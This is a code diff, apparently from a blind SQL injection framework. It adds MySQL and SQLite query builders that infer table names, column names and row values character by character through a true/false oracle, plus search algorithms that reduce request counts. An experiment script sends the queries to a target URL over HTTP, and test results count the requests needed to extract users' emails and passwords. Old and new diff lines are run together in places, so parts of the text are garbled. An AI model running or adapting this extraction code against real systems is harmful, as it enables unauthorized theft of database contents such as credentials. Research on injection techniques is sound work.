def char_is_ascii(self, ctx):
query = f'''
SELECT ord(convert(substr(TABLE_NAME, {len(ctx.s) + 1}, 1) using utf32)) < {ASCII_MAX + 1}
FROM information_schema.TABLES
WHERE TABLE_SCHEMA=database()
LIMIT 1
OFFSET {ctx.row}
'''
return self.normalize(query)
def char(self, ctx, values):
has_eos = EOS in values
values = [v for v in values if v != EOS]
values = ''.join(values).encode('utf-8').hex()
if has_eos:
query = f'''
SELECT locate(substr(TABLE_NAME, {len(ctx.s) + 1}, 1), x'{values}')
FROM information_schema.TABLES
WHERE TABLE_SCHEMA=database()
LIMIT 1
OFFSET {ctx.row}
'''
else:
query = f'''
SELECT char_length(TABLE_NAME) != {len(ctx.s)} AND
locate(substr(TABLE_NAME, {len(ctx.s) + 1}, 1), x'{values}')
FROM information_schema.TABLES
WHERE TABLE_SCHEMA=database()
LIMIT 1
OFFSET {ctx.row}
'''
return self.normalize(query)
def char_unicode(self, ctx, n):
query = f'''
SELECT ord(convert(substr(TABLE_NAME, {len(ctx.s) + 1}, 1) using utf32)) < {n}
FROM information_schema.TABLES
WHERE TABLE_SCHEMA=database()
LIMIT 1
OFFSET {ctx.row}
'''
return self.normalize(query)
def string(self, ctx):
raise NotImplementedError('TODO?')
class MySQLColumnsQueries(UniformQueries):
def rows_count(self, ctx, n):
query = f'''
SELECT count(*) < {n}
FROM information_schema.COLUMNS
WHERE TABLE_SCHEMA=database() AND
TABLE_NAME=x'{self.hex(ctx.table)}'
'''
return self.normalize(query)
def rows_are_ascii(self, ctx):
query = f'''
SELECT min(COLUMN_NAME = CONVERT(COLUMN_NAME using ASCII))
FROM information_schema.COLUMNS
WHERE TABLE_SCHEMA=database() AND
TABLE_NAME=x'{self.hex(ctx.table)}'
'''
return self.normalize(query)
def row_is_ascii(self, ctx):
query = f'''
SELECT min(COLUMN_NAME = CONVERT(COLUMN_NAME using ASCII))
FROM information_schema.COLUMNS
WHERE TABLE_SCHEMA=database() AND
TABLE_NAME=x'{self.hex(ctx.table)}'
LIMIT 1
OFFSET {ctx.row}
'''
return self.normalize(query)
def char_is_ascii(self, ctx):
query = f'''
SELECT ord(convert(substr(COLUMN_NAME, {len(ctx.s) + 1}, 1) using utf32)) < {ASCII_MAX + 1}
FROM information_schema.COLUMNS
WHERE TABLE_SCHEMA=database() AND
TABLE_NAME=x'{self.hex(ctx.table)}'
LIMIT 1
OFFSET {ctx.row}
'''
return self.normalize(query)
def char(self, ctx, values):
has_eos = EOS in values
values = [v for v in values if v != EOS]
values = ''.join(values).encode('utf-8').hex()
if has_eos:
query = f'''
SELECT locate(substr(COLUMN_NAME, {len(ctx.s) + 1}, 1), x'{values}')
FROM information_schema.COLUMNS
WHERE TABLE_SCHEMA=database() AND
TABLE_NAME=x'{self.hex(ctx.table)}'
LIMIT 1
OFFSET {ctx.row}
'''
else:
query = f'''
SELECT char_length(COLUMN_NAME) != {len(ctx.s)} AND
locate(substr(COLUMN_NAME, {len(ctx.s) + 1}, 1), x'{values}')
FROM information_schema.COLUMNS
WHERE TABLE_SCHEMA=database() AND
TABLE_NAME=x'{self.hex(ctx.table)}'
LIMIT 1
OFFSET {ctx.row}
'''
return self.normalize(query)
def char_unicode(self, ctx, n):
query = f'''
SELECT ord(convert(substr(COLUMN_NAME, {len(ctx.s) + 1}, 1) using utf32)) < {n}
FROM information_schema.COLUMNS
WHERE TABLE_SCHEMA=database() AND
TABLE_NAME=x'{self.hex(ctx.table)}'
LIMIT 1
OFFSET {ctx.row}
'''
return self.normalize(query)
def string(self, ctx):
raise NotImplementedError('TODO?')
class MySQLRowsQueries(UniformQueries):
def rows_count(self, ctx, n):
query = f'''
SELECT count(*) < {n}
FROM {MySQL.escape(ctx.table)}
'''
return self.normalize(query)
def rows_are_ascii(self, ctx):
query = f'''
SELECT min({MySQL.escape(ctx.column)} = CONVERT({MySQL.escape(ctx.column)} using ASCII))
FROM {MySQL.escape(ctx.table)}
'''
return self.normalize(query)
def row_is_ascii(self, ctx):
query = f'''
SELECT min({MySQL.escape(ctx.column)} = CONVERT({MySQL.escape(ctx.column)} using ASCII))
FROM {MySQL.escape(ctx.table)}
LIMIT 1
OFFSET {ctx.row}
'''
return self.normalize(query)
def char_is_ascii(self, ctx):
query = f'''
SELECT ord(convert(substr({MySQL.escape(ctx.column)}, {len(ctx.s) + 1}, 1) using utf32)) < {ASCII_MAX + 1}
FROM {MySQL.escape(ctx.table)}
LIMIT 1
OFFSET {ctx.row}
'''
return self.normalize(query)
def char(self, ctx, values):
has_eos = EOS in values
values = [v for v in values if v != EOS]
values = ''.join(values).encode('utf-8').hex()
if has_eos:
query = f'''
SELECT locate(substr({MySQL.escape(ctx.column)}, {len(ctx.s) + 1}, 1), x'{values}')
FROM {MySQL.escape(ctx.table)}
LIMIT 1
OFFSET {ctx.row}
'''
else:
query = f'''
SELECT char_length({MySQL.escape(ctx.column)}) != {len(ctx.s)} AND
locate(substr({MySQL.escape(ctx.column)}, {len(ctx.s) + 1}, 1), x'{values}')
FROM {MySQL.escape(ctx.table)}
LIMIT 1
OFFSET {ctx.row}
'''
return self.normalize(query)
def char_unicode(self, ctx, n):
query = f'''
SELECT ord(convert(substr({MySQL.escape(ctx.column)}, {len(ctx.s) + 1}, 1) using utf32)) < {n}
FROM {MySQL.escape(ctx.table)}
LIMIT 1
OFFSET {ctx.row}
'''
return self.normalize(query)
def string(self, ctx, values):
values = [f"x'{v.encode('utf-8').hex()}'" for v in values]
query = f'''
SELECT {MySQL.escape(ctx.column)} in ({','.join(values)})
FROM {MySQL.escape(ctx.table)}
LIMIT 1
OFFSET {ctx.row}
'''
return self.normalize(query)
class MySQL(DBMS): class MySQL(DBMS):
DATA_TYPES = [ DATA_TYPES = [
@ -14,151 +303,15 @@ class MySQL(DBMS):
'multilinestring', 'multipolygon', 'geometrycollection ', 'json' 'multilinestring', 'multipolygon', 'geometrycollection ', 'json'
] ]
MetaQueries = MySQLMetaQueries()
TablesQueries = MySQLTablesQueries()
ColumnsQueries = MySQLColumnsQueries()
RowsQueries = MySQLRowsQueries()
def count_rows(self, ctx, n): @staticmethod
query = f''' def escape(s):
SELECT COUNT(*) < {n} if DBMS._RE_ESCAPE.match(s):
FROM {ctx.table} return s
''' assert '`' not in s, f'Cannot escape "{s}"'
return self.normalize(query) return f'`{s}`'
def count_tables(self, ctx, n):
query = f'''
SELECT COUNT(*) < {n}
FROM information_schema.TABLES
WHERE TABLE_SCHEMA=DATABASE()
'''
return self.normalize(query)
def count_columns(self, ctx, n):
query = f'''
SELECT COUNT(*) < {n}
FROM information_schema.COLUMNS
WHERE TABLE_SCHEMA=DATABASE() AND
TABLE_NAME='{ctx.table}'
'''
return self.normalize(query)
def meta_type(self, ctx, values):
values = [f"'{v}'" for v in values]
query = f'''
SELECT LOWER(DATA_TYPE) in ({','.join(values)})
FROM information_schema.columns
WHERE TABLE_SCHEMA=DATABASE() AND
TABLE_NAME='{ctx.table}' AND
COLUMN_NAME='{ctx.column}'
'''
return self.normalize(query)
def meta_is_nullable(self, ctx):
query = f'''
SELECT IS_NULLABLE='YES'
FROM information_schema.columns
WHERE TABLE_SCHEMA=DATABASE() AND
TABLE_NAME='{ctx.table}' AND
COLUMN_NAME='{ctx.column}'
'''
return self.normalize(query)
def meta_is_pk(self, ctx):
query = f'''
SELECT COLUMN_KEY='PRI'
FROM information_schema.columns
WHERE TABLE_SCHEMA=DATABASE() AND
TABLE_NAME='{ctx.table}' AND
COLUMN_NAME='{ctx.column}'
'''
return self.normalize(query)
def char_rows(self, ctx, values):
has_eos = EOS in values
values = [v for v in values if v != EOS]
values = ''.join(values).encode('ascii').hex()
if has_eos:
# if the next char is EOS, substr() resolves to "" and subsequently instr(..., "") resolves to True
query = f'''
SELECT LOCATE(SUBSTRING({ctx.column}, {len(ctx.s) + 1}, 1), x'{values}')
FROM {ctx.table}
LIMIT 1
OFFSET {ctx.row}
'''
else:
query = f'''
SELECT SUBSTRING({ctx.column}, {len(ctx.s) + 1}, 1) != '' AND
LOCATE(SUBSTRING({ctx.column}, {len(ctx.s) + 1}, 1), x'{values}')
FROM {ctx.table}
LIMIT 1
OFFSET {ctx.row}
'''
return self.normalize(query)
def char_tables(self, ctx, values):
has_eos = EOS in values
values = [v for v in values if v != EOS]
values = ''.join(values).encode('ascii').hex()
if has_eos:
query = f'''
SELECT LOCATE(SUBSTRING(TABLE_NAME, {len(ctx.s) + 1}, 1), x'{values}')
FROM information_schema.TABLES
WHERE TABLE_SCHEMA=DATABASE()
LIMIT 1
OFFSET {ctx.row}
'''
else:
query = f'''
SELECT SUBSTRING(TABLE_NAME, {len(ctx.s) + 1}, 1) != '' AND
LOCATE(SUBSTRING(TABLE_NAME, {len(ctx.s) + 1}, 1), x'{values}')
FROM information_schema.TABLES
WHERE TABLE_SCHEMA=DATABASE()
LIMIT 1
OFFSET {ctx.row}
'''
return self.normalize(query)
def char_columns(self, ctx, values):
has_eos = EOS in values
values = [v for v in values if v != EOS]
values = ''.join(values).encode('ascii').hex()
if has_eos:
query = f'''
SELECT LOCATE(SUBSTRING(COLUMN_NAME, {len(ctx.s) + 1}, 1), x'{values}')
FROM information_schema.COLUMNS
WHERE TABLE_SCHEMA=DATABASE() AND
TABLE_NAME='{ctx.table}'
LIMIT 1
OFFSET {ctx.row}
'''
else:
query = f'''
SELECT SUBSTRING(COLUMN_NAME, {len(ctx.s) + 1}, 1) != '' AND
LOCATE(SUBSTRING(COLUMN_NAME, {len(ctx.s) + 1}, 1), x'{values}')
FROM information_schema.COLUMNS
WHERE TABLE_SCHEMA=DATABASE() AND
TABLE_NAME='{ctx.table}'
LIMIT 1
OFFSET {ctx.row}
'''
return self.normalize(query)
def string_rows(self, ctx, values):
values = [f"x'{v.encode('ascii').hex()}'" for v in values]
query = f'''
SELECT {ctx.column} in ({','.join(values)})
FROM {ctx.table}
LIMIT 1
OFFSET {ctx.row}
'''
return self.normalize(query)

@ -1,145 +1,290 @@
from hakuin.utils import EOS from hakuin.utils import EOS
from .DBMS import DBMS from .DBMS import DBMS, MetaQueries, UniformQueries
class SQLite(DBMS): class SQLiteMetaQueries(MetaQueries):
DATA_TYPES = ['INTEGER', 'TEXT', 'REAL', 'NUMERIC', 'BLOB'] def column_data_type(self, ctx, values):
values = [f"'{v}'" for v in values]
def count_rows(self, ctx, n):
query = f''' query = f'''
SELECT COUNT(*) < {n} SELECT type in ({','.join(values)})
FROM {ctx.table} FROM pragma_table_info(x'{self.hex(ctx.table)}')
WHERE name=x'{self.hex(ctx.column)}'
''' '''
return self.normalize(query) return self.normalize(query)
def count_tables(self, ctx, n): def column_is_nullable(self, ctx):
query = f''' query = f'''
SELECT COUNT(*) < {n} SELECT [notnull] == 0
FROM pragma_table_info(x'{self.hex(ctx.table)}')
WHERE name=x'{self.hex(ctx.column)}'
'''
return self.normalize(query)
def column_is_pk(self, ctx):
query = f'''
SELECT pk
FROM pragma_table_info(x'{self.hex(ctx.table)}')
WHERE name=x'{self.hex(ctx.column)}'
'''
return self.normalize(query)
class SQLiteTablesQueries(UniformQueries):
def rows_count(self, ctx, n):
query = f'''
SELECT count(*) < {n}
FROM sqlite_master FROM sqlite_master
WHERE type='table' WHERE type='table'
''' '''
return self.normalize(query) return self.normalize(query)
def count_columns(self, ctx, n): def rows_are_ascii(self, ctx):
# SQLite does not have native "isascii" function. As a workaround we try to look for
# non-ascii characters with "*[^\x01-0x7f]*" glob patterns. The pattern does not need to
# include the null terminator (0x00) because SQLite will never pass it to the GLOB expression.
# Also, the pattern is hex-encoded because SQLite does not support special characters in
# string literals. Lastly, sum() simulates the logical ANY operator here. Note that an empty string
# resolves to True, which is correct.
query = f''' query = f'''
SELECT COUNT(*) < {n} SELECT sum(name not glob cast(x'2a5b5e012d7f5d2a' as TEXT))
FROM pragma_table_info('{ctx.table}') FROM sqlite_master
WHERE type='table'
''' '''
return self.normalize(query) return self.normalize(query)
def meta_type(self, ctx, values): def row_is_ascii(self, ctx):
values = [f"'{v}'" for v in values]
query = f''' query = f'''
SELECT type in ({','.join(values)}) SELECT name not glob cast(x'2a5b5e012d7f5d2a' as TEXT)
FROM pragma_table_info('{ctx.table}') FROM sqlite_master
WHERE name='{ctx.column}' WHERE type='table'
'''
return self.normalize(query)
def meta_is_nullable(self, ctx):
query = f'''
SELECT [notnull] == 0
FROM pragma_table_info('{ctx.table}')
WHERE name='{ctx.column}'
'''
return self.normalize(query)
def meta_is_pk(self, ctx):
query = f'''
SELECT pk
FROM pragma_table_info('{ctx.table}')
WHERE name='{ctx.column}'
'''
return self.normalize(query)
def char_rows(self, ctx, values):
has_eos = EOS in values
values = [v for v in values if v != EOS]
values = ''.join(values).encode('ascii').hex()
if has_eos:
# if the next char is EOS, substr() resolves to "" and subsequently instr(..., "") resolves to True
query = f'''
SELECT instr(x'{values}', substr({ctx.column}, {len(ctx.s) + 1}, 1))
FROM {ctx.table}
LIMIT 1
OFFSET {ctx.row}
'''
else:
query = f'''
SELECT substr({ctx.column}, {len(ctx.s) + 1}, 1) != '' AND
instr(x'{values}', substr({ctx.column}, {len(ctx.s) + 1}, 1))
FROM {ctx.table}
LIMIT 1
OFFSET {ctx.row}
'''
return self.normalize(query)
def char_tables(self, ctx, values):
has_eos = EOS in values
values = [v for v in values if v != EOS]
values = ''.join(values).encode('ascii').hex()
if has_eos:
query = f'''
SELECT instr(x'{values}', substr(name, {len(ctx.s) + 1}, 1))
FROM sqlite_master
WHERE type='table'
LIMIT 1
OFFSET {ctx.row}
'''
else:
query = f'''
SELECT substr(name, {len(ctx.s) + 1}, 1) != '' AND
instr(x'{values}', substr(name, {len(ctx.s) + 1}, 1))
FROM sqlite_master
WHERE type='table'
LIMIT 1
OFFSET {ctx.row}
'''
return self.normalize(query)
def char_columns(self, ctx, values):
has_eos = EOS in values
values = [v for v in values if v != EOS]
values = ''.join(values).encode('ascii').hex()
if has_eos:
query = f'''
SELECT instr(x'{values}', substr(name, {len(ctx.s) + 1}, 1))
FROM pragma_table_info('{ctx.table}')
LIMIT 1
OFFSET {ctx.row}
'''
else:
query = f'''
SELECT substr(name, {len(ctx.s) + 1}, 1) != '' AND
instr(x'{values}', substr(name, {len(ctx.s) + 1}, 1))
FROM pragma_table_info('{ctx.table}')
LIMIT 1
OFFSET {ctx.row}
'''
return self.normalize(query)
def string_rows(self, ctx, values):
values = [f"x'{v.encode('ascii').hex()}'" for v in values]
query = f'''
SELECT cast({ctx.column} as BLOB) in ({','.join(values)})
FROM {ctx.table}
LIMIT 1 LIMIT 1
OFFSET {ctx.row} OFFSET {ctx.row}
''' '''
return self.normalize(query) return self.normalize(query)
def char_is_ascii(self, ctx):
query = f'''
SELECT substr(name, {len(ctx.s) + 1}, 1) not glob cast(x'2a5b5e012d7f5d2a' as TEXT)
FROM sqlite_master
WHERE type='table'
LIMIT 1
OFFSET {ctx.row}
'''
return self.normalize(query)
def char(self, ctx, values):
has_eos = EOS in values
values = [v for v in values if v != EOS]
values = ''.join(values).encode('utf-8').hex()
if has_eos:
query = f'''
SELECT instr(x'{values}', substr(name, {len(ctx.s) + 1}, 1))
FROM sqlite_master
WHERE type='table'
LIMIT 1
OFFSET {ctx.row}
'''
else:
query = f'''
SELECT length(name) != {len(ctx.s)} AND
instr(x'{values}', substr(name, {len(ctx.s) + 1}, 1))
FROM sqlite_master
WHERE type='table'
LIMIT 1
OFFSET {ctx.row}
'''
return self.normalize(query)
def char_unicode(self, ctx, n):
query = f'''
SELECT unicode(substr(name, {len(ctx.s) + 1}, 1)) < {n}
FROM sqlite_master
WHERE type='table'
LIMIT 1
OFFSET {ctx.row}
'''
return self.normalize(query)
def string(self, ctx):
raise NotImplementedError('TODO?')
class SQLiteColumnsQueries(UniformQueries):
def rows_count(self, ctx, n):
query = f'''
SELECT count(*) < {n}
FROM pragma_table_info(x'{self.hex(ctx.table)}')
'''
return self.normalize(query)
def rows_are_ascii(self, ctx):
query = f'''
SELECT sum(name not glob cast(x'2a5b5e012d7f5d2a' as TEXT))
FROM pragma_table_info(x'{self.hex(ctx.table)}')
'''
return self.normalize(query)
def row_is_ascii(self, ctx):
query = f'''
SELECT name not glob cast(x'2a5b5e012d7f5d2a' as TEXT)
FROM pragma_table_info(x'{self.hex(ctx.table)}')
LIMIT 1
OFFSET {ctx.row}
'''
return self.normalize(query)
def char_is_ascii(self, ctx):
query = f'''
SELECT substr(name, {len(ctx.s) + 1}, 1) not glob cast(x'2a5b5e012d7f5d2a' as TEXT)
FROM pragma_table_info(x'{self.hex(ctx.table)}')
LIMIT 1
OFFSET {ctx.row}
'''
return self.normalize(query)
def char(self, ctx, values):
has_eos = EOS in values
values = [v for v in values if v != EOS]
values = ''.join(values).encode('utf-8').hex()
if has_eos:
query = f'''
SELECT instr(x'{values}', substr(name, {len(ctx.s) + 1}, 1))
FROM pragma_table_info(x'{self.hex(ctx.table)}')
LIMIT 1
OFFSET {ctx.row}
'''
else:
query = f'''
SELECT length(name) != {len(ctx.s)} AND
instr(x'{values}', substr(name, {len(ctx.s) + 1}, 1))
FROM pragma_table_info(x'{self.hex(ctx.table)}')
LIMIT 1
OFFSET {ctx.row}
'''
return self.normalize(query)
def char_unicode(self, ctx, n):
query = f'''
SELECT unicode(substr(name, {len(ctx.s) + 1}, 1)) < {n}
FROM pragma_table_info(x'{self.hex(ctx.table)}')
LIMIT 1
OFFSET {ctx.row}
'''
return self.normalize(query)
def string(self, ctx):
raise NotImplementedError('TODO?')
class SQLiteRowsQueries(UniformQueries):
def rows_count(self, ctx, n):
query = f'''
SELECT count(*) < {n}
FROM {SQLite.escape(ctx.table)}
'''
return self.normalize(query)
def rows_are_ascii(self, ctx):
query = f'''
SELECT sum({SQLite.escape(ctx.column)} not glob cast(x'2a5b5e012d7f5d2a' as TEXT))
FROM {SQLite.escape(ctx.table)}
'''
return self.normalize(query)
def row_is_ascii(self, ctx):
query = f'''
SELECT {SQLite.escape(ctx.column)} not glob cast(x'2a5b5e012d7f5d2a' as TEXT)
FROM {SQLite.escape(ctx.table)}
LIMIT 1
OFFSET {ctx.row}
'''
return self.normalize(query)
def char_is_ascii(self, ctx):
query = f'''
SELECT substr({SQLite.escape(ctx.column)}, {len(ctx.s) + 1}, 1) not glob cast(x'2a5b5e012d7f5d2a' as TEXT)
FROM {SQLite.escape(ctx.table)}
LIMIT 1
OFFSET {ctx.row}
'''
return self.normalize(query)
def char(self, ctx, values):
has_eos = EOS in values
values = [v for v in values if v != EOS]
values = ''.join(values).encode('utf-8').hex()
if has_eos:
query = f'''
SELECT instr(x'{values}', substr({SQLite.escape(ctx.column)}, {len(ctx.s) + 1}, 1))
FROM {SQLite.escape(ctx.table)}
LIMIT 1
OFFSET {ctx.row}
'''
else:
query = f'''
SELECT length({SQLite.escape(ctx.column)}) != {len(ctx.s)} AND
instr(x'{values}', substr({SQLite.escape(ctx.column)}, {len(ctx.s) + 1}, 1))
FROM {SQLite.escape(ctx.table)}
LIMIT 1
OFFSET {ctx.row}
'''
return self.normalize(query)
def char_unicode(self, ctx, n):
query = f'''
SELECT unicode(substr({SQLite.escape(ctx.column)}, {len(ctx.s) + 1}, 1)) < {n}
FROM {SQLite.escape(ctx.table)}
LIMIT 1
OFFSET {ctx.row}
'''
return self.normalize(query)
def string(self, ctx, values):
values = [f"x'{v.encode('utf-8').hex()}'" for v in values]
query = f'''
SELECT cast({SQLite.escape(ctx.column)} as BLOB) in ({','.join(values)})
FROM {SQLite.escape(ctx.table)}
LIMIT 1
OFFSET {ctx.row}
'''
return self.normalize(query)
class SQLite(DBMS):
DATA_TYPES = ['INTEGER', 'TEXT', 'REAL', 'NUMERIC', 'BLOB']
MetaQueries = SQLiteMetaQueries()
TablesQueries = SQLiteTablesQueries()
ColumnsQueries = SQLiteColumnsQueries()
RowsQueries = SQLiteRowsQueries()

@ -42,19 +42,23 @@ class SearchAlgorithm(metaclass=ABCMeta):
class IntExponentialSearch(SearchAlgorithm): class IntExponentialBinarySearch(SearchAlgorithm):
'''Exponential search for integers.''' '''Exponential and binary search for integers.'''
def __init__(self, requester, query_cb, upper=16, correct=None): def __init__(self, requester, query_cb, lower=0, upper=16, find_range=True, correct=None):
'''Constructor. '''Constructor.
Params: Params:
requester (Requester): Requester instance requester (Requester): Requester instance
query_cb (function): query construction function query_cb (function): query construction function
upper (int): initial upper bound of search range lower (int): lower bound of search range
upper (int): upper bound of search range
find_range (bool): exponentially expands range until the correct value is within
correct (int|None): correct value. If provided, the search is emulated correct (int|None): correct value. If provided, the search is emulated
''' '''
super().__init__(requester, query_cb) super().__init__(requester, query_cb)
self.lower = lower
self.upper = upper self.upper = upper
self.find_range = find_range
self.correct = correct self.correct = correct
self.n_queries = 0 self.n_queries = 0
@ -63,22 +67,26 @@ class IntExponentialSearch(SearchAlgorithm):
'''Runs the search algorithm. '''Runs the search algorithm.
Params: Params:
ctx (Context): inference context ctx (Context): extraction context
Returns: Returns:
int: inferred number int: inferred number
''' '''
self.n_queries = 0 self.n_queries = 0
lower, upper = self._get_range(ctx, lower=0, upper=self.upper) if self.find_range:
lower, upper = self._find_range(ctx, lower=self.lower, upper=self.upper)
else:
lower, upper = self.lower, self.upper
return self._search(ctx, lower, upper) return self._search(ctx, lower, upper)
def _get_range(self, ctx, lower, upper): def _find_range(self, ctx, lower, upper):
'''Exponentially expands the search range until the correct value is within. '''Exponentially expands the search range until the correct value is within.
Params: Params:
ctx (Context): inference context ctx (Context): extraction context
lower (int): lower bound lower (int): lower bound
upper (int): upper bound upper (int): upper bound
@ -88,14 +96,14 @@ class IntExponentialSearch(SearchAlgorithm):
if self._query(ctx, upper): if self._query(ctx, upper):
return lower, upper return lower, upper
return self._get_range(ctx, upper, upper * 2) return self._find_range(ctx, upper, upper * 2)
def _search(self, ctx, lower, upper): def _search(self, ctx, lower, upper):
'''Numeric binary search. '''Numeric binary search.
Params: Params:
ctx (Context): inference context ctx (Context): extraction context
lower (int): lower bound lower (int): lower bound
upper (int): upper bound upper (int): upper bound
@ -108,8 +116,8 @@ class IntExponentialSearch(SearchAlgorithm):
middle = (lower + upper) // 2 middle = (lower + upper) // 2
if self._query(ctx, middle): if self._query(ctx, middle):
return self._search(ctx, lower, middle) return self._search(ctx, lower, middle)
else:
return self._search(ctx, middle, upper) return self._search(ctx, middle, upper)
def _query(self, ctx, n): def _query(self, ctx, n):
@ -118,8 +126,8 @@ class IntExponentialSearch(SearchAlgorithm):
if self.correct is None: if self.correct is None:
query_string = self.query_cb(ctx, n) query_string = self.query_cb(ctx, n)
return self.requester.request(ctx, query_string) return self.requester.request(ctx, query_string)
else:
return self.correct < n return self.correct < n
@ -144,13 +152,12 @@ class BinarySearch(SearchAlgorithm):
'''Runs the search algorithm. '''Runs the search algorithm.
Params: Params:
ctx (Context): inference context ctx (Context): extraction context
Returns: Returns:
value|None: inferred value or None on fail value|None: inferred value or None on fail
''' '''
self.n_queries = 0 self.n_queries = 0
return self._search(ctx, self.values) return self._search(ctx, self.values)
@ -165,8 +172,8 @@ class BinarySearch(SearchAlgorithm):
if self._query(ctx, left): if self._query(ctx, left):
return self._search(ctx, left) return self._search(ctx, left)
else:
return self._search(ctx, right) return self._search(ctx, right)
def _query(self, ctx, values): def _query(self, ctx, values):
@ -175,8 +182,8 @@ class BinarySearch(SearchAlgorithm):
if self.correct is None: if self.correct is None:
query_string = self.query_cb(ctx, values) query_string = self.query_cb(ctx, values)
return self.requester.request(ctx, query_string) return self.requester.request(ctx, query_string)
else:
return self.correct in values return self.correct in values
@ -204,13 +211,12 @@ class TreeSearch(SearchAlgorithm):
'''Runs the search algorithm. '''Runs the search algorithm.
Params: Params:
ctx (Context): inference context ctx (Context): extraction context
Returns: Returns:
value|None: inferred value or None on fail value|None: inferred value or None on fail
''' '''
self.n_queries = 0 self.n_queries = 0
return self._search(ctx, self.tree, in_tree=self.in_tree) return self._search(ctx, self.tree, in_tree=self.in_tree)
@ -218,7 +224,7 @@ class TreeSearch(SearchAlgorithm):
'''Tree search. '''Tree search.
Params: Params:
ctx (Context): inference context ctx (Context): extraction context
tree (utils.huffman.Node): Huffman tree to search tree (utils.huffman.Node): Huffman tree to search
in_tree (bool): True if the correct value is known to be in the tree in_tree (bool): True if the correct value is known to be in the tree
@ -237,10 +243,11 @@ class TreeSearch(SearchAlgorithm):
if self._query(ctx, tree.left.values()): if self._query(ctx, tree.left.values()):
return self._search(ctx, tree.left, True) return self._search(ctx, tree.left, True)
else:
if tree.right is None: if tree.right is None:
return None return None
return self._search(ctx, tree.right, in_tree)
return self._search(ctx, tree.right, in_tree)
def _query(self, ctx, values): def _query(self, ctx, values):
@ -249,5 +256,5 @@ class TreeSearch(SearchAlgorithm):
if self.correct is None: if self.correct is None:
query_string = self.query_cb(ctx, values) query_string = self.query_cb(ctx, values)
return self.requester.request(ctx, query_string) return self.requester.request(ctx, query_string)
else:
return self.correct in values return self.correct in values

@ -7,8 +7,10 @@ DIR_FILE = os.path.dirname(os.path.realpath(__file__))
DIR_ROOT = os.path.abspath(os.path.join(DIR_FILE, '..')) DIR_ROOT = os.path.abspath(os.path.join(DIR_FILE, '..'))
DIR_MODELS = os.path.join(DIR_ROOT, 'data', 'models') DIR_MODELS = os.path.join(DIR_ROOT, 'data', 'models')
ASCII_MAX = 0x7f
UNICODE_MAX = 0x10ffff
CHARSET_ASCII = [chr(x) for x in range(128)] + ['</s>'] CHARSET_ASCII = [chr(x) for x in range(128)] + ['</s>']
CHARSET_SCHEMA = list(string.ascii_lowercase + string.digits + '_#@') + ['</s>']
EOS = '</s>' EOS = '</s>'
SOS = '<s>' SOS = '<s>'

@ -12,22 +12,31 @@ DIR_DBS = os.path.abspath(os.path.join(DIR_FILE, 'dbs'))
class OfflineRequester(Requester): class OfflineRequester(Requester):
'''Offline requester for testing purposes.''' '''Offline requester for testing purposes.'''
def __init__(self, db): def __init__(self, db, verbose=False):
'''Constructor. '''Constructor.
Params: Params:
db (str): name of an .sqlite DB in the "dbs" dir db (str): name of an .sqlite DB in the "dbs" dir
verbose (bool): flag for verbous prints
''' '''
db_file = os.path.join(DIR_DBS, f'{db}.sqlite') db_file = os.path.join(DIR_DBS, f'{db}.sqlite')
assert os.path.exists(db_file), f'DB not found: {db_file}' assert os.path.exists(db_file), f'DB not found: {db_file}'
self.db = sqlite3.connect(db_file).cursor() self.db = sqlite3.connect(db_file).cursor()
self.verbose = verbose
self.n_queries = 0 self.n_queries = 0
def request(self, ctx, query): def request(self, ctx, query):
self.n_queries += 1 self.n_queries += 1
query = f'SELECT cast(({query}) as bool)' query = f'SELECT cast(({query}) as bool)'
return bool(self.db.execute(query).fetchone()[0])
res = bool(self.db.execute(query).fetchone()[0])
if self.verbose:
print(f'"{ctx.s}"\t{res}\t{query}')
return res
def reset(self): def reset(self):

7
tests/dbs/unicode.json Normal file

@ -0,0 +1,7 @@
{
"Ħ€ȽȽ© ŴǑȒȽƉ": [
{
"Ħ€ȽȽ© ŴǑȒȽƉ": "Ħ€ȽȽ© ŴǑȒȽƉ"
}
]
}

BIN
tests/dbs/unicode.sqlite Normal file

Binary file not shown.

@ -21,7 +21,7 @@ FILE_LARGE_CONTENT_JSON = os.path.join(DIR_DBS, 'large_content.json')
def main(): def main():
assert len(sys.argv) in [1, 3], 'python3 experiment_generic_db_offline.py [table> <column>]' assert len(sys.argv) in [1, 3], 'python3 experiment_generic_db_offline.py [table> <column>]'
requester = OfflineRequester(db='large_content') requester = OfflineRequester(db='large_content', verbose=False)
ext = Extractor(requester=requester, dbms=SQLite()) ext = Extractor(requester=requester, dbms=SQLite())
if len(sys.argv) == 3: if len(sys.argv) == 3:
@ -60,58 +60,58 @@ if __name__ == '__main__':
# { # {
# "users": { # "users": {
# "username": [ # "username": [
# 42124, # 42125,
# 5.738182808881624 # 5.738319030104891
# ], # ],
# "first_name": [ # "first_name": [
# 27901, # 27902,
# 4.882919145957298 # 4.883094154707735
# ], # ],
# "last_name": [ # "last_name": [
# 32701, # 32702,
# 5.344173884621671 # 5.344337310017977
# ], # ],
# "sex": [ # "sex": [
# 1608, # 1609,
# 0.3216 # 0.3218
# ], # ],
# "email": [ # "email": [
# 78138, # 78139,
# 3.7532062058696383 # 3.7532542389163743
# ], # ],
# "password": [ # "password": [
# 137115, # 137116,
# 4.28484375 # 4.284875
# ], # ],
# "address": [ # "address": [
# 86872, # 86873,
# 2.1946795341434453 # 2.1947047975140843
# ] # ]
# }, # },
# "posts": { # "posts": {
# "text": [ # "text": [
# 409302, # 409303,
# 4.312482220185226 # 4.312492756371759
# ] # ]
# }, # },
# "comments": { # "comments": {
# "text": [ # "text": [
# 346373, # 346374,
# 3.920464063384267 # 3.9204753820033957
# ] # ]
# }, # },
# "products": { # "products": {
# "name": [ # "name": [
# 491174, # 491175,
# 3.8737341871983344 # 3.873742073882457
# ], # ],
# "category": [ # "category": [
# 6721, # 6753,
# 0.42975893599334997 # 0.4318051026280453
# ], # ],
# "description": [ # "description": [
# 966309, # 966310,
# 3.2259549579023976 # 3.2259582963324007
# ] # ]
# } # }
# } # }

@ -27,3 +27,8 @@ def main():
if __name__ == '__main__': if __name__ == '__main__':
main() main()
# Expected results:
# Total requests: 27376
# Average RPC: 2.2098805295447206

@ -25,13 +25,17 @@ class R(Requester):
r = requests.get(url) r = requests.get(url)
assert r.status_code in [200, 404], f'Unexpected resposne code: {r.status_code}' assert r.status_code in [200, 404], f'Unexpected resposne code: {r.status_code}'
# print(ctx.s, r.status_code == 200, query)
return r.status_code == 200 return r.status_code == 200
def main(): def main():
assert len(sys.argv) == 4, 'python3 experiment_generic_db.py <dbms> <table> <column>' assert len(sys.argv) >= 2, 'python3 experiment_generic_db.py <dbms> [<table> <column>]'
